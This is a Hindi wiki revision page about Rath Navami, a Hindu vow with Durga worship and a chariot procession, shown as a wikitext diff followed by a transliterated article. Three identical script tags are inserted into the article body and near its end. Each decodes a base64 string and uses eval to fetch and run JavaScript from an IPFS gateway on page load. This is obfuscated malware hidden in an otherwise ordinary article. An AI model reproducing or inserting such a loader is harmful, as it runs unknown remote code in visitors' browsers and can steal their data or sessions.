Difference between revisions of "रथ नवमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
(7 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*कृत्यकल्पतरु के अनुसार [[आश्विन]] [[शुक्ल पक्ष]] की [[नवमी]] को रथनवमी होती है।
 
*कृत्यकल्पतरु के अनुसार [[आश्विन]] [[शुक्ल पक्ष]] की [[नवमी]] को रथनवमी होती है।
 
*हेमाद्रि के अनुसार [[कृष्ण पक्ष]] की नवमी तिथि रथनवमी होती है।
 
*हेमाद्रि के अनुसार [[कृष्ण पक्ष]] की नवमी तिथि रथनवमी होती है।
Line 6: Line 6:
 
*जनमार्ग से रथ को लाकर दुर्गा मन्दिर तक पहुँचाना, [[प्रकाश]], [[नृत्य कला|नृत्य]] एवं [[संगीत]] से जागर किया जाता है।
 
*जनमार्ग से रथ को लाकर दुर्गा मन्दिर तक पहुँचाना, [[प्रकाश]], [[नृत्य कला|नृत्य]] एवं [[संगीत]] से जागर किया जाता है।
 
*दूसरे दिन प्रात: प्रतिमा का स्नान तथा दुर्गा के लिए रथ का समर्पण करना चाहिए।
 
*दूसरे दिन प्रात: प्रतिमा का स्नान तथा दुर्गा के लिए रथ का समर्पण करना चाहिए।
*ऐसी मान्यता है कि  एक सुन्दर पलंग, [[बैल]] एवं शीघ्र ही बच्चा देने वाली [[गाय]] का दान करना चाहिए। <ref>कृत्यकल्पतरु (व्रत खण्ड 294-298); हेमाद्रि (व्रत खण्ड 1, 946-948, [[भविष्यपुराण]] से उद्धरण)</ref>
+
*ऐसी मान्यता है कि  एक सुन्दर पलंग, [[बैल]] एवं शीघ्र ही बच्चा देने वाली [[गाय]] का दान करना चाहिए।<ref>कृत्यकल्पतरु (व्रत खण्ड 294-298); हेमाद्रि (व्रत खण्ड 1, 946-948, [[भविष्यपुराण]] से उद्धरण</ref>
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:48, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • krityakalpataru ke anusar ashvin shukl paksh ki navami ko rathanavami hoti hai.
  • hemadri ke anusar krishna paksh ki navami tithi rathanavami hoti hai.
  • rathanavami ke us din upavas v durga pooja ki jati hai.
  • aisi manyata hai ki darpanoan, chauriyoan, vastroan, chhatr, malaoan adi se susajjit rath par bhaianse par baithi durga ki svarn pratima ki pooja karani chahie.
  • janamarg se rath ko lakar durga mandir tak pahuanchana, prakash, nrity evan sangit se jagar kiya jata hai.
  • doosare din prat: pratima ka snan tatha durga ke lie rath ka samarpan karana chahie.
  • aisi manyata hai ki ek sundar palang, bail evan shighr hi bachcha dene vali gay ka dan karana chahie.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. krityakalpataru (vrat khand 294-298); hemadri (vrat khand 1, 946-948, bhavishyapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>